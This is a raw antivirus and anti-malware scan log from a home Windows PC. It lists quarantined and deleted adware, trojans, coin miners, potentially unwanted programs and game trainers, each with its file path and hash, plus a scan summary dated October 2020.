Adware.Tuto4PC.Generic, C:\Program Files\KSPH2GUN0K\uninstaller.exe, Quarantined, 3729, 404709, , , , , FDD3C212CBEECBF7342194EE4CAE3668, 8CE3816BC69F1AA48712F8F0E48FA06DAD1D7F580AFD1DFEADF486BF5EEA22F3
Adware.Tuto4PC.Generic, C:\Program Files\KSPH2GUN0K\uninstaller.exe.config, Quarantined, 3729, 404709, , , , , A2EBF843442988EE2D667E9C7FC28CE1, 8A0D5D6C5AB131BAB9C8A29A7BCC81D6470EC515F2E4BCA977A4FE62FD156ACC
PUP.Optional.BookHelper, C:\USERS\OHM\APPDATA\ROAMING\OPERA SOFTWARE\OPERA STABLE\EXTENSIONS\ICJFCIIJODMGNKHMGKICBFGIEPAFMHGA\1.0.0.0_0\MANIFEST.JSON, Quarantined, 2620, 784087, 1.0.30712, , ame, , 40C655834DC21CA941A694220873A8EA, A2793C258D967B88D3AE5E5F2D008C707E587234C61EE01402456050CC3110D2
PUP.Optional.BookHelper, C:\Users\Ohm\AppData\Roaming\Opera Software\Opera Stable\Extensions\icjfciijodmgnkhmgkicbfgiepafmhga\1.0.0.0_0\background.js, Quarantined, 2620, 784087, , , , , FEDACA056D174270824193D664E50A3F, 8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
PUP.Optional.BookHelper, C:\Users\Ohm\AppData\Roaming\Opera Software\Opera Stable\Extensions\icjfciijodmgnkhmgkicbfgiepafmhga\1.0.0.0_0\book.js, Quarantined, 2620, 784087, , , , , 30CBBF4DF66B87924C75750240618648, D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
PUP.Optional.BookHelper, C:\Users\Ohm\AppData\Roaming\Opera Software\Opera Stable\Extensions\icjfciijodmgnkhmgkicbfgiepafmhga\1.0.0.0_0\icon.png, Quarantined, 2620, 784087, , , , , 5D207F5A21E55E47FCCD8EF947A023AE, 4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
PUP.Optional.BookHelper, C:\Users\Ohm\AppData\Roaming\Opera Software\Opera Stable\Extensions\icjfciijodmgnkhmgkicbfgiepafmhga\1.0.0.0_0\icon48.png, Quarantined, 2620, 784087, , , , , E35B805293CCD4F74377E9959C35427D, 2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
PUP.Optional.BookHelper, C:\Users\Ohm\AppData\Roaming\Opera Software\Opera Stable\Extensions\icjfciijodmgnkhmgkicbfgiepafmhga\1.0.0.0_0\jquery-1.8.3.min.js, Quarantined, 2620, 784087, , , , , E1288116312E4728F98923C79B034B67, BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
PUP.Optional.BookHelper, C:\Users\Ohm\AppData\Roaming\Opera Software\Opera Stable\Extensions\icjfciijodmgnkhmgkicbfgiepafmhga\1.0.0.0_0\popup.html, Quarantined, 2620, 784087, , , , , E93B02D6CFFCCA037F3EA55DC70EE969, B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
PUP.Optional.BookHelper, C:\Users\Ohm\AppData\Roaming\Opera Software\Opera Stable\Extensions\icjfciijodmgnkhmgkicbfgiepafmhga\1.0.0.0_0\popup.js, Quarantined, 2620, 784087, , , , , 2AC02EE5F808BC4DEB832FB8E7F6F352, DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\DHLDSABHZ1\CAST.CONFIG, Quarantined, 3729, 404709, 1.0.30712, , ame, , 83F7D63FA6AB284C3D114A223EF5F444, 6B38BE869C25815474B9798BB6CD0BE92D97B260F24670457563C4578BC8F8F3
Adware.Tuto4PC.Generic, C:\Program Files\DHLDSABHZ1\DHLDSABHZ.exe.config, Quarantined, 3729, 404709, , , , , A2EBF843442988EE2D667E9C7FC28CE1, 8A0D5D6C5AB131BAB9C8A29A7BCC81D6470EC515F2E4BCA977A4FE62FD156ACC
Adware.Tuto4PC.Generic, C:\Program Files\DHLDSABHZ1\uninstaller.exe, Quarantined, 3729, 404709, , , , , FDD3C212CBEECBF7342194EE4CAE3668, 8CE3816BC69F1AA48712F8F0E48FA06DAD1D7F580AFD1DFEADF486BF5EEA22F3
Adware.Tuto4PC.Generic, C:\Program Files\DHLDSABHZ1\uninstaller.exe.config, Quarantined, 3729, 404709, , , , , A2EBF843442988EE2D667E9C7FC28CE1, 8A0D5D6C5AB131BAB9C8A29A7BCC81D6470EC515F2E4BCA977A4FE62FD156ACC
Adware.WizzMonetize, C:\PROGRAM FILES\DHLDSABHZ1\DHLDSABHZ.EXE, Quarantined, 12644, 827982, 1.0.30712, B0741CE6E8E1EE70F1DBDA78, dds, 00923412, F118E3F1CCD41628B3ADE873554AB3D6, CFE8DCAC115DA2B888E72A2BF6931D8D71FD3BA74DF17E6D2337A5CB89AFA1EB
Adware.WizzMonetize, C:\PROGRAM FILES\KSPH2GUN0K\KSPH2GUN0.EXE, Quarantined, 12644, 827982, 1.0.30712, B0741CE6E8E1EE70F1DBDA78, dds, 00923412, F118E3F1CCD41628B3ADE873554AB3D6, CFE8DCAC115DA2B888E72A2BF6931D8D71FD3BA74DF17E6D2337A5CB89AFA1EB
Trojan.Agent, C:\WINDOWS\3D03298B616C.SYS, Quarantined, 502, 847709, 1.0.30712, , ame, , 83B77957421FF0595B96ADA634DF885E, BD85FFA911BC6D8948AB27270592FF056A77F97AE2F45E4464C18157840FD1AB
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\PP9DKL5E1V\CAST.CONFIG, Quarantined, 3729, 404709, 1.0.30712, , ame, , 19ED735C922BEA35BABE53FF70CB6196, 9F2FF77F5D175782B6D01387BC3897C92D6463768A657003472B200B03FC128E
Adware.Tuto4PC.Generic, C:\Program Files\PP9DKL5E1V\SRBJZ6QBU.exe.config, Quarantined, 3729, 404709, , , , , A2EBF843442988EE2D667E9C7FC28CE1, 8A0D5D6C5AB131BAB9C8A29A7BCC81D6470EC515F2E4BCA977A4FE62FD156ACC
Adware.Tuto4PC.Generic, C:\Program Files\PP9DKL5E1V\uninstaller.exe, Quarantined, 3729, 404709, , , , , FDD3C212CBEECBF7342194EE4CAE3668, 8CE3816BC69F1AA48712F8F0E48FA06DAD1D7F580AFD1DFEADF486BF5EEA22F3
Adware.Tuto4PC.Generic, C:\Program Files\PP9DKL5E1V\uninstaller.exe.config, Quarantined, 3729, 404709, , , , , A2EBF843442988EE2D667E9C7FC28CE1, 8A0D5D6C5AB131BAB9C8A29A7BCC81D6470EC515F2E4BCA977A4FE62FD156ACC
Spyware.PasswordStealer, C:\USERS\OHM\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\ICJFCIIJODMGNKHMGKICBFGIEPAFMHGA\1.0.0.0_0\D8YI+HF7RX.JS, Quarantined, 560, 847708, 1.0.30712, , ame, , 30CBBF4DF66B87924C75750240618648, D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
Trojan.MalPack.GO, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\186CAB67386AD2D5.VIR, Quarantined, 11199, 862199, 1.0.30712, , ame, , 00F7D2CFAEA86D18736B006C6FEBFEC5, ED003AD5CA17592BDA69629AAC47A1355A7D778168827C4E5552B5220BE29694
Trojan.MalPack.GS, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\6B1ACD25B857E1C4.VIR, Quarantined, 8247, 860178, 1.0.30712, C862A7D45D22BBCCB2E61D70, dds, 00923412, 6C0618384A66CB98F0A8A1DE36206572, FF917339FF036567DB2B713E2125DE52B92FCB0D5C81A5CFC57CB5D2FC9324EB
Generic.Malware/Suspicious, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\BCD1C77A10ED6501.VIR, Quarantined, 0, 392686, 1.0.30712, , shuriken, , 08103650C80FE70D1D9647E1BB7B9FC9, FCC0E1D6F7321750DD273164F97473D1E4F1C78AF63A539DBB9DCF900E3C1781
Spyware.PasswordStealer.GO, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\43D26E32C75AE1FC.VIR, Quarantined, 9677, 835370, 1.0.30712, , ame, , C6E81BAC5A3385A0A9CEF0BF9B45C624, 3414DDDA2D8E2D44F7E33CF513DE0C6A10D593E0358AD55586657D42682FFB5C
Trojan.BitCoinMiner.Generic, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\82AC2DE386FD67E6.VIR, Quarantined, 3781, 811154, 1.0.30712, , ame, , 69292742888F4F3828988EACB474431D, BE0108B777BE7C095B49D3B8D1CDF20DA2189A24E98C01F1EC4CC2988ACA0E29
Generic.Malware/Suspicious, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\FCDE83A446C0E1C2.VIR, Quarantined, 0, 392686, 1.0.30712, , shuriken, , C07A4F2C1ED89B5044EAE1D832F49FC7, 5A3ED5641F881089FA932992BBB36343E2BEA21B97F7C20342E4524309BEA6D7
Generic.Malware/Suspicious, C:\USERS\OHM\APPDATA\ROAMING\3XNTZTSLRAM\JYILYW2TCFF.EXE, Quarantined, 0, 392686, 1.0.30712, , shuriken, , 900EEB60BFCF8045C2EF33751EB451A0, 9D5D420B636E1F312E143ADB4EBA68B1A1F4801F00CFD3FE6DCDDB75F325A0E3
PUP.Optional.FusionCore, C:\USERS\OHM\APPDATA\ROAMING\POWERISO\UPGRADE\POWERISO7-X64.EXE, Quarantined, 7347, 604099, 1.0.30712, , ame, , 3E0520A6576684FA369494171FCC37E7, 965963D3672E87A1F4E4419AC98C7BE2C35B5F0863A2EA54D40CCE74D72BB1AA
Trojan.Glupteba, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\8D3EF17154F2F83A.VIR, Quarantined, 4330, 862749, 1.0.30712, , ame, , BD898EB13D8E894A971A71B356161904, 5CB314EEA283B237A8744D7D9D5C0109FC17B7DD5DBA4558CE3431DC5A3F213A
Trojan.Ranumbot, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\A9108614CDE96F3F.VIR, Quarantined, 8240, 819921, 1.0.30712, 80FFC50A2E0CA2698626A167, dds, 00923412, 62DC2B5D62C2C08650CFCA322FC2CCCF, BE7B484F78BF36A09F7FE040F7F523FA1AF63757BD23813ABFB2C307A9E73CEF
Trojan.Glupteba, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\D4719B8929FB9FD5.VIR, Quarantined, 4330, 862749, 1.0.30712, , ame, , F07B5A9DB7985322F0EFF5FE71C44D3C, 2F175D67BBDD710D3C89DBE8BD90065C4E03F6E926119F41F83403F70880784A
Generic.Malware/Suspicious, C:\USERS\OHM\APPDATA\ROAMING\RXKBZ25ZQHH\Q1RHLUHCQ3Z.EXE, Quarantined, 0, 392686, 1.0.30712, , shuriken, , 900EEB60BFCF8045C2EF33751EB451A0, 9D5D420B636E1F312E143ADB4EBA68B1A1F4801F00CFD3FE6DCDDB75F325A0E3
Trojan.Glupteba, C:\USERS\OHM\APPDATA\ROAMING\3D03298B616C\3D03298B616C.EXE, Quarantined, 4330, 862749, 1.0.30712, , ame, , EF4D910AF40F9FD4571884FB4D47434A, F50076640E94621EDB47CAC15734B2C7F61E115CB17365963928F5872E78E3C7
Generic.Malware/Suspicious, C:\USERS\OHM\APPDATA\ROAMING\PWZZFIMXNZ2\Y53VMVTZYZF.EXE, Quarantined, 0, 392686, 1.0.30712, , shuriken, , 900EEB60BFCF8045C2EF33751EB451A0, 9D5D420B636E1F312E143ADB4EBA68B1A1F4801F00CFD3FE6DCDDB75F325A0E3
PUP.Optional.PQwick, C:\PROGRAM FILES (X86)\VICS\DREAMTRIP.EXE, Quarantined, 3276, 451812, 1.0.30712, , ame, , 7EC2DC7B1F8F981BDA11868FD9493234, 1DE138BB3E707B6D6E0C8F5242444FF9F1C84882D18A00E3DA36A8547F6343C9
Generic.Malware/Suspicious, C:\USERS\OHM\APPDATA\ROAMING\EU4RGPYTXSG\MDGJ1D4HGV2.EXE, Quarantined, 0, 392686, 1.0.30712, , shuriken, , 900EEB60BFCF8045C2EF33751EB451A0, 9D5D420B636E1F312E143ADB4EBA68B1A1F4801F00CFD3FE6DCDDB75F325A0E3
Malware.AI.1427837911, C:\USERS\OHM\APPDATA\LOCAL\SCRSNAP\UNSTALL.EXE, Quarantined, 1000000, 0, 1.0.30712, 63E6673982E1A3A9551B13D7, dds, 00923412, 8A2DD57DABDA0B986EE3259EA1050C37, 0290567FD5A0AFD8560957FD971D324123BFC94CC75D1A96F34E570FF7C27C43
Trojan.Shutdown.UPX, C:\USERS\OHM\DESKTOP\ALL!\ALL GG!\BRAWL!\Dead or Alive 5 - Last Round.lnk, Quarantined, 12113, 306883, , , , , 519250D28FEBE82970F5B412FF806A93, C4E12F8C07625E3DC2FB35179A9DD18A2C47CFED24F48C08EB2647CE0A8A3477
Trojan.Shutdown.UPX, C:\USERS\OHM\DESKTOP\ALL!\ALL GG!\GAMES!!\Dead or Alive 5 - Last Round.lnk, Quarantined, 12113, 306883, , , , , 519250D28FEBE82970F5B412FF806A93, C4E12F8C07625E3DC2FB35179A9DD18A2C47CFED24F48C08EB2647CE0A8A3477
Trojan.Shutdown.UPX, C:\USERS\OHM\Desktop\Dead or Alive 5 - Last Round.lnk, Quarantined, 12113, 306883, , , , , 519250D28FEBE82970F5B412FF806A93, C4E12F8C07625E3DC2FB35179A9DD18A2C47CFED24F48C08EB2647CE0A8A3477
Trojan.Shutdown.UPX, E:\STALLINGGRADE!\BEAUTIFUL BRAWLING BASTARDS!\DEAD OR ALIVE 5 - LAST ROUND\GAMESR.EXE, Quarantined, 12113, 306883, 1.0.30712, , ame, , A554824B371F5AE670A88A1FB8FB64AB, 78EAB970B7050FD666C3FB50EBE94D1D6260711B4903DE51ECC088C85960509A
Trojan.MalPack.Generic, C:\USERS\OHM\DESKTOP\ALL!\ASS!\MegaTrainer XL.lnk, Quarantined, 8149, 83856, , , , , 883D8FDFC414F4E6B1DF103FC50D2275, 929C6B5305CDF4A7F43C184A5B43CE607A465F65EC944FD81FC5293A5CD86444
Trojan.MalPack.Generic, C:\PROGRAM FILES (X86)\MEGADEV\MD-TRAINERS\MEGATRAINER XL\MEGATRAINERXL.EXE, Quarantined, 8149, 83856, 1.0.30712, 0000000000000000000003EC, dds, 00923412, 64BB206F203AA0D7DA3546D346FD6B2E, 796267C975C6C392D6C4241A1BA9324658D1FFE0A789523B318DF7207B13744B

Physical Sector: 0
(No malicious items detected)

WMI: 0
(No malicious items detected)


(end)

 

 

10/4/2020 20:49:19 PM
Files scanned: 1972136
Detected files: 288
Cleaned files: 288
Total scan time 09:39:42
Scan status: Finished
C:\FRST\Quarantine\C\Windows\System32\Tasks\ScheduledUpdate.xBAD    XML/TrojanDownloader.Agent.B trojan    cleaned by deleting

C:\FRST\Quarantine\C\Windows\Temp\mawut.exe.xBAD    a variant of Win32/Injector.EEXO trojan    cleaned by deleting

C:\FRST\Quarantine\C\Windows\Temp\tnkjeja.exe.xBAD    a variant of Win32/Injector.EEXO trojan    cleaned by deleting

C:\FRST\Quarantine\C\Windows\Temp\ucdglck.exe.xBAD    a variant of Win32/Kryptik.HCTY trojan    cleaned by deleting

C:\KITT ENDS!\1st!\driver_booster_setup_o.exe    a variant of Win32/IObit.AJ potentially unwanted application,a variant of Win32/IObit.AE potentially unwanted application,a variant of Win32/IObit.AH potentially unwanted application,a variant of Win32/IObit.AU potentially unwanted application,a variant of Win32/IObit.AG potentially unwanted application,a variant of Win32/IObit.Z potentially unwanted application    cleaned by deleting

C:\KITT ENDS!\2nd!\rcsetup153.exe    Win32/Bundled.Toolbar.Google.D potentially unsafe application    cleaned by deleting

C:\KITT ENDS!\2nd!\WeChat_Setup_1352591589 APP KIWI.exe    Win32/InstallCore.Gen.B potentially unwanted application    cleaned by deleting

C:\KITT ENDS!\5th!\media.player.codec.pack.v4.5.5.setup.exe    a variant of Win32/FusionCore.AX potentially unwanted application    cleaned by deleting

C:\Program Files\DAEMON Tools Lite\inst\setuphlp.dll    a variant of Win32/Yandex.K potentially unwanted application    deleted

C:\Program Files (x86)\DreamCatcher\Domination\reloaded.exe    a variant of Generik.NXGQQEY trojan    cleaned by deleting

C:\Program Files (x86)\IObit\Driver Booster\6.3.0\AutoUpdate.exe    a variant of Win32/IObit.AH potentially unwanted application    cleaned by deleting

C:\Program Files (x86)\IObit\Driver Booster\6.3.0\DriverBooster.exe    a variant of Win32/IObit.AE potentially unwanted application    cleaned by deleting

C:\Program Files (x86)\IObit\Driver Booster\6.3.0\IObitDownloader.exe    a variant of Win32/IObit.AG potentially unwanted application    cleaned by deleting

C:\Program Files (x86)\IObit\Driver Booster\6.3.0\SetupHlp.exe    a variant of Win32/IObit.AU potentially unwanted application    cleaned by deleting

C:\Program Files (x86)\IObit\Driver Booster\6.3.0\Vulnerabilityfix.exe    a variant of Win32/IObit.AG potentially unwanted application    cleaned by deleting

C:\Program Files (x86)\IObit\Driver Booster\6.3.0\Vulnerabilityfix_1908.exe    a variant of Win32/IObit.AG potentially unwanted application    cleaned by deleting

C:\Program Files (x86)\Square Enix\Dungeon Siege III Collection\steam_api.dll    a variant of Win32/HackTool.Crack.BQ potentially unsafe application    cleaned by deleting

C:\Program Files (x86)\VICS\seed.sfx.exe    Win32/TrojanDownloader.Zurgop.DA trojan    cleaned by deleting

C:\ProgramData\IObit\Driver Booster\Downloader\db6\ASCSetup.exe    a variant of Win32/IObit.AP potentially unwanted application,a variant of Win32/IObit.AV potentially unwanted application,a variant of Win32/IObit.AS potentially unwanted application    cleaned by deleting

C:\ProgramData\IObit\Driver Booster\Downloader\db6\WCInstaller.exe    a variant of MSIL/WebCompanion.C potentially unwanted application    cleaned by deleting

C:\Users\Ohm\AppData\Local\Mozilla\Firefox\Profiles\s6poxj0c.default\cache2\entries\5112143864E14DB398BB00072C41F02D4A263F07    HTML/Refresh.BC trojan    cleaned by deleting

C:\Users\Ohm\AppData\Roaming\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Guard.exe    a variant of MSIL/CoinMiner.APP trojan    cleaned by deleting

C:\Users\Ohm\AppData\Roaming\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\mint.exe    Win64/CoinMiner.UC trojan    cleaned by deleting

C:\Users\Ohm\Favorites\GET ADDS!\Premium Offers Space.url    LNK/Agent.CH trojan    cleaned by deleting

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7C547C738D6EA3AF8433CE56C3BEA502    a variant of Win32/Kryptik.HGMQ trojan    cleaned by deleting

D:\GGGODEM! ~S~\BEAUTIFUL BRAWLING BASTARDS!\BLAZBLUE!\UNRAR!\BB TRIGGER\BlazBlue - Calamity Trigger v1.0.0.0 + 8 Trainer.exe    a variant of Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\BEAUTIFUL BRAWLING BASTARDS!\BLAZBLUE!\UNRAR!\BB TRIGGER\BLAZBLUE CT Act.2 DELTA10FY.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\BEAUTIFUL BRAWLING BASTARDS!\BLAZBLUE!\UNRAR!\CENTRALFICTION!\BlazBlue Centralfiction V05.05.2017 Trainer +2 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\BATTLEFLEET GOTHICH ARMADA!\Battlefleet Gothic Armada V1.8.10317 Trainer +9 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\BAYONETTA!\UNRAR!\1.0!\Bayonetta V1.0 Plus 9 Trainer.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\BAYONETTA!\UNRAR!\1.0!\Bayonetta v1.0-v1.01 Plus 11 Trainer.exe    a variant of Win32/GameHack.AUM potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\BAYONETTA!\UNRAR!\BAYONETTA!G\Bayonetta v1.0-v1.01 Plus 11 Trainer.exe    a variant of Win32/GameHack.AUM potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\COMMAND & CONQUER!\UNRAR!\KW 1.02 +5 Command and Conquer 3 Trainer -Abolfazl.k\Command & Conquer 3 Trainer.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\COMMAND & CONQUER!\UNRAR!\TW 1.09 +11 1c0c93tibwar-ch\C & C 3 Trainer 1.09.exe    a variant of Win32/GameHack.F potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\COMMAND & CONQUER!\UNRAR!\Command & Conquer 3 Kanes Wrath V1.0.0 Trainer +3 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DARKSIDERS!\UNRAR!\Dark_FY\Darksiders_FY_P.exe    a variant of Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DARKSIDERS!\UNRAR!\Darksiders V01.01.2017 Trainer +3 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DEVIL MAY CRY!\DMC 4!\Devil May Cry 4 Special Edition v1.0 Plus 20 Trainer.exe    a variant of Win32/GameHack.AUM potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DEVIL MAY CRY!\UNRAR DMC RE!\IT'S  1.1! FOR UPOINTS!\DmC+18Tr-LNG_Steam.exe    a variant of Win32/Packed.VMProtect.AAH trojan    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DEVIL MAY CRY!\UNRAR DMC RE!\IT'S 1.2! YES! IDK!\DmC+18Tr-LNG_UD1.2.exe    a variant of Win32/Packed.VMProtect.AAH trojan    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DEVIL MAY CRY!\UNRAR DMC RE!\NO 1.0!\DmC+14Tr-LNG.exe    a variant of Win32/GameHack.EI potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DEVIL MAY CRY!\UNRAR DMC RE!\NO 1.0!\DmC+18Tr-LNG_UD1.3.exe    a variant of Win32/Packed.VMProtect.AAH trojan    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DEVIL MAY CRY!\UNRAR DMC RE!\NO 1.0!\dmctrainer.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DEVIL MAY CRY!\UNRAR DMC RE!\NO 1.0!\DMC_PLUS8_TRN-dEViATED.exe    a variant of Win32/GameHack.PG potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DEVIL MAY CRY!\UNRAR DMC3!\1.0!! YES!\asx-p4-dmc3se.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DEVIL MAY CRY!\UNRAR DMC3!\1.0!! YES!\trainer.exe    a variant of Win32/GameHack.ABX potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DEVIL MAY CRY!\UNRAR DMC3!\1.10! mmno\asx-dmc3se_jpn_v1.10.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DEVIL MAY CRY!\UNRAR DMC3!\1.20\asx-dmc3se_jpn_v1.2.0.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DEVIL MAY CRY!\UNRAR DMC3!\1.30\asx-dmc3se_jpn_v1.3.0.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\DEVIL MAY CRY!\UNRAR DMC3!\HD 1.0!\Devil May Cry 3 HD v1.0 Plus 11 Trainer.exe    a variant of Win64/GameHack.AU potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\KILLER IS DEAD!\Killer is Dead V1.00 Trainer +5 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\Prototype!\Prototype + 16 Trainer - CES-LinGon\Prototype + 16 Trainer - CES-LinGon.exe    a variant of Win32/GameHack.EI potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TITAN QUEST!\UNRAR!\Titan Quest Anniversary Edition V2.1.1 Trainer +8 MrAntiFun.exe    a variant of MSIL/GameHack.AIM potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\A Rebel Galaxy V1.08 Trainer +9 MrAntiFun\Rebel Galaxy V1.08 GOG Trainer +9 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\A Rebel Galaxy V1.08 Trainer +9 MrAntiFun\Rebel Galaxy V1.08 Steam Trainer +9 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\ALL DIVINITY!\Divinity Original Sin Enhanced Edition V2.0.119.430 Trainer +12 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\ALL ONGOING!\One Finger Death Punch Trainer\One Finger Death Punch Trainer.exe    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\ALL ONGOING!\GemCraft Chasing Shadows (+3)[v1.0.6 [Steam][Enjoy].exe    a variant of Win32/GameHack.EFQ potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\DUNGEON SIEGE!\DA TRAINERS GOOO!\1st fail!!\1ST FAIL\asx-p8-ds2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\DUNGEON SIEGE!\DA TRAINERS GOOO!\1st fail!!\asx-ds2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\DUNGEON SIEGE!\DA TRAINERS GOOO!\1st fail!!\asx-p8-ds2 (2).exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\DUNGEON SIEGE!\DA TRAINERS GOOO!\1st fail!!\asx-p8-ds2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\DUNGEON SIEGE!\DA TRAINERS GOOO!\asx-ds2_For_v2.2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\DUNGEON SIEGE!\DA TRAINERS GOOO!\pztrain.exe    a variant of Win32/GameHack.O potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\GOG!\RAIDEN III\RaidenIIIDE.Plus3.Trainer.exe    a variant of Win32/GameHack.CNW potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\GOG!\RAIDEN IV!\RaidenIVOverkill.Plus2.Trainer.exe    a variant of Win32/GameHack.CNW potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\ORCS MUST DIE!\Orcs Must Die 2 V1.0.0.362 Steam Trainer +7 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

D:\GGGODEM! ~S~\DA TOOL TRAIN!\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\SACRED!\SacredGold_CH_promo.exe    a variant of MSIL/GameHack.AEL potentially unsafe application    cleaned by deleting

